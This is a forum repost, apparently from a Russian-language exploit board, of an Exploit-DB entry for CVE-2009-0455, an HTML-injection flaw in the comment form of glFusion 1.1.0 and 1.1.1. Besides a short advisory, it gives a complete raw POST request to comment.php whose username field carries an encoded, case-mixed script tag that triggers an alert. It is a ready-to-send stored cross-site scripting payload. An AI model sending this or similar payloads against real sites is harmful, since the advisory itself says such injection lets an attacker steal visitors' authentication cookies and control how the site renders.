Exploit glFusion 1.1 - Anonymous Comment 'Username' HTML Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
32784
Проверка EDB
  1. Пройдено
Автор
BJARNE MATHIESEN SCHACHT
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2009-0455
Дата публикации
2009-02-05
Код:
source: https://www.securityfocus.com/bid/33683/info

glFusion is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

glFusion 1.1.0 and 1.1.1 are vulnerable; other versions may also be affected. 

POST /comment.php HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash,
application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-
application, */*
Accept-Language: da
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding:
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Host: www.glfusion.org
Pragma: no-cache
Connection: Keep-Alive
sid=fileid_20&pid=0&type=filemgmt&_glsectoken=&comment=&uid=1&username=Anonymous+Use
r%22%3e%3csCrIpT%3ealert(1234)%3c%2fsCrIpT%3e&title=Hello&comment=Hello&comment_h
tml=Hello&postmode=html&captcha=47TXJC&csid=49816d4bcd4b&mode=Submit+Comment
 
Источник
www.exploit-db.com

Похожие темы